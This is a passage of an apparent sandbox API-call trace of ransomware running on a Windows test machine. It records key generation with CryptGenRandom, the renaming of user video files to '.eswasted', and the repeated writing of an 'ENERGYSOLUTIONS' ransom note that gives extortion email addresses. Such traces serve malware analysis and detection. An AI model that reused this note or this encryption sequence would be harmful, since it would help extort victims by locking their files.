Size=0x403) returned 0x4eaa28 [0082.372] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.372] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.372] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]dU7tb5YpjzeCGXmomXXpglTnoXra9xf6IUtlkdiZsevgXnd7rRLWmNpxVcooRqK5\r\n/7V3N9rpjgnr6a3bs3alUKwhB1jhV/NT44T+QYEcLNF0JPm8P0pjTqTVmrTehQv3\r\noK6gf7ImT+32I8Tv49bDdAn5Gug6tink5tyUZ5yfUQcyKg/hjlUqKAOZeE0Q1JQl\r\n+2pRH/0saA/CwjSGqKJxgd+Hiy/tQjNDk4jfusv3N7ZMorUhX86VA9kES4WMkF5Q\r\nCFETTKAo0wRndihdiEBmkd+qu1xXfdl37wL8w80ST8F0EjDaaNMCG6E9yjtKuzC4\r\nzHbP8VM6HHIRO4gkytPWQMML2LkkytHffbhb+WxQ+gyUHq54id7Gs8Qo8u1ZR3gq\r\n9vT4v554tFmsaR6UCUZk4D946Ap0lVboJHnH3DezzSVo6hfBsgxvViW8vcVLFpuE\r\num6e/Efl1Gp6XKb7SrlAjvc3kKgB9+W+gNP7LnCfqu4jnX4MkmrjgrPkICwYkd3f\r\nAL+e7XC3hxizN1FshRkiYUMkJIiBPehUMjxJpzVqp05d0LerO1WbshZqphcqOwwh\r\nRUO5l//2X6FJ24D5cv+DxKvFndbt7D1O3uMbWrtNEqse+uCdXEnFyBg487QjDazu\r\n4bhNC8qdtTqQXLRxvbv7U7/zzre4J2uf9HtXwuU+RDs=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.372] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eaa28 | out: hHeap=0x4a0000) returned 1 [0082.372] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.372] SetEndOfFile (hFile=0x118) returned 1 [0082.374] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.374] CloseHandle (hObject=0x118) returned 1 [0082.376] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef648 | out: hHeap=0x4a0000) returned 1 [0082.376] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e5730 | out: hHeap=0x4a0000) returned 1 [0082.376] _aulldvrm () returned 0x0 [0082.376] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.377] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.377] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\zK1CMtyTqVo8AjgOssp.mp4") returned 84 [0082.377] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b2) returned 0x4ef440 [0082.377] lstrcpyW (in: lpString1=0x4ef4e8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.377] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.377] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.378] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.378] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\zK1CMtyTqVo8AjgOssp.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\zk1cmtytqvo8ajgossp.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.378] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.379] SetEndOfFile (hFile=0x118) returned 1 [0082.379] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.379] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.379] lstrcpyW (in: lpString1=0x4ef4e8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\zK1CMtyTqVo8AjgOssp.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\zk1cmtytqvo8ajgossp.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\zK1CMtyTqVo8AjgOssp.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\zk1cmtytqvo8ajgossp.mp4.eswasted")) returned 1 [0082.514] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\zK1CMtyTqVo8AjgOssp.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\zk1cmtytqvo8ajgossp.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0082.515] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0082.515] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xd336 [0082.515] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd336) returned 0xb10000 [0082.515] CloseHandle (hObject=0x110) returned 1 [0082.518] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.519] CloseHandle (hObject=0x120) returned 1 [0082.519] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0082.519] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.519] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0082.519] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.520] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.521] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.521] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.530] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.530] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.530] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.530] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]BLXOREIck6aehRWgX1FcCySOr/I/spgqsVNT19SDGoDsAZnuuM7ivPJFZkPdYgY/\r\ncPbi0/VZ7tFcgnubZGwYA47Vov9PyBpTt4Qb1dCuXbLeev5cXrvKR8a6khVp6vla\r\nOjjLZ1WqWr4G75zuR6LIO1xPANx/eKKKosXO0fMFM8VPMWKNLF/giJyOZvuIn1Gd\r\nuzMiRnHzo3OIP5htNPnaXalKrqzRUa4ptaNs2O74EEJMbcRFPZ/iSGkIPhdGV4CJ\r\nouUUD7tP55QxCtgGBo+s7T1GCO2ZwMBbLaLe8rSuQa3/AlubIpP6207nGxERybZd\r\n5GY+/dIeFiKW+IwAQet7NJwzrIJzfcfVStrul3V/6Zj7vZzEwJBAhse2wRzJ72LU\r\nnOU4TlRz/CcxxadaCDX30DUunEGOdZuo1QLSi05WCMm1rDwZPmBaiKb7EVbHEzJ7\r\n6adpv8d7Ov0coxOuebGOMR0H66OfHYfUokyvIhqoJnH7WtUfa2IsvB4et4/75hNA\r\nkWZDOFUojdYhAEcKzJmDmvS8NYeYsQwZy6nkAGUlT3JaOCvOjXHhmTjtrpDnheMz\r\nz4zA7TVRkOx2Gdh1TSSI7ClkYJDYAw8ZpLXEyMT+YCkIQgbvYAvkms60MrMondJI\r\nTql5PASlttUeavNTNxviG4Q218OxwKRrr3l50l7Hl8j=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.530] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.530] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.530] SetEndOfFile (hFile=0x118) returned 1 [0082.534] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.534] CloseHandle (hObject=0x118) returned 1 [0082.536] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.536] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efd10 | out: hHeap=0x4a0000) returned 1 [0082.536] _aulldvrm () returned 0x0 [0082.536] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.537] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.537] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.537] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\IPMOc-55mKcO5.mkv") returned 72 [0082.537] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x29a) returned 0x4cb238 [0082.537] lstrcpyW (in: lpString1=0x4cb2c8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.537] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.537] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.538] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.539] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\IPMOc-55mKcO5.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ipmoc-55mkco5.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.539] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.541] SetEndOfFile (hFile=0x118) returned 1 [0082.541] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.541] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.541] lstrcpyW (in: lpString1=0x4cb2c8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\IPMOc-55mKcO5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ipmoc-55mkco5.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\IPMOc-55mKcO5.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ipmoc-55mkco5.mkv.eswasted")) returned 1 [0082.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\IPMOc-55mKcO5.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ipmoc-55mkco5.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0082.543] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0082.543] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x15358 [0082.543] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15358) returned 0xb10000 [0082.543] CloseHandle (hObject=0x120) returned 1 [0082.547] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.548] CloseHandle (hObject=0x110) returned 1 [0082.548] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef440 [0082.548] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.549] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0082.549] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.549] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.549] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.549] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.577] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4d91a8 [0082.577] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.577] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.577] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]iKDzvmkyfJoG0lEzt3t8hDFECXDMD1BY5mI6TywQtm8IIwTuJE+zjerCcB+bcfFR\r\nRvNyOts4zUhu9cW2ggBBL+KSInsrEpR8GIYdPFvO52SCKbUCx/0XBTAQNXCJYkIm\r\nlXRKePO5MZgiMAYHnfjyA4/0rza7Brt+31ZG2ceRqvJleL6TqOVzpnIpaXZFWt+S\r\nLu/BpN5j/+TPQ06ltiTjtJdny3bHoCPyxWqgO9echvtlI5IZb6+FJaMu9TmEeEBj\r\nbZp4v2RGO/UAotDN/paCJEF04dK9N0G9GEuk2HrCUgo0HqIu/PSj6d2QgYaV1P82\r\nZOt/usTC6M/C2Wr/XQyEwXdagwzpYtfVmyNdQ7AULcJVEJ4zQKSufya1g/yIhImW\r\n/wecPYNah5k2Sjfrt44POgsteT12fVk6X9uDMiFCDtwfXBqAOd2rdmUei4x/EwLX\r\n5Kh/YS3aAL8ZlTOWNNn2svx1sldUSBAXWB7qfaRsRB8u/ODnl70Sk3URu0z0PAUa\r\n9wV/FhZB6UqQwzgx4T2COyx02atlB4gJF5HcGZlmj20L4pp25TDoQQC4h4n+T6t1\r\nn9JmLAZ5j6wsx95x2ZjTJoS49VI7+X+EkimnKH/eFRc0RGkViWeoPsBtKMFzEf+v\r\n0ceWytnN3YE3wwUgnpERwYnq0TuM5bv/iUIA9PPnOhv=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.577] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.577] WriteFile (in: hFile=0x118, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.577] SetEndOfFile (hFile=0x118) returned 1 [0082.598] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.598] CloseHandle (hObject=0x118) returned 1 [0082.601] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cb238 | out: hHeap=0x4a0000) returned 1 [0082.601] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef9c8 | out: hHeap=0x4a0000) returned 1 [0082.601] _aulldvrm () returned 0x0 [0082.601] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.602] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.602] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\KFNkAs.avi") returned 65 [0082.602] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28c) returned 0x4d91a8 [0082.602] lstrcpyW (in: lpString1=0x4d922a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.602] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.602] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.603] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.603] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\KFNkAs.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\kfnkas.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.604] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.605] SetEndOfFile (hFile=0x118) returned 1 [0082.606] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.606] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.606] lstrcpyW (in: lpString1=0x4d922a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\KFNkAs.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\kfnkas.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\KFNkAs.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\kfnkas.avi.eswasted")) returned 1 [0082.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\KFNkAs.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\kfnkas.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.607] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0082.607] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x6bf [0082.607] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6bf) returned 0x2d0000 [0082.608] CloseHandle (hObject=0xf8) returned 1 [0082.610] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.610] CloseHandle (hObject=0xfc) returned 1 [0082.610] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef440 [0082.610] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.611] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0082.612] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.612] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.613] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.613] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.622] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ef648 [0082.622] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.622] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.622] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 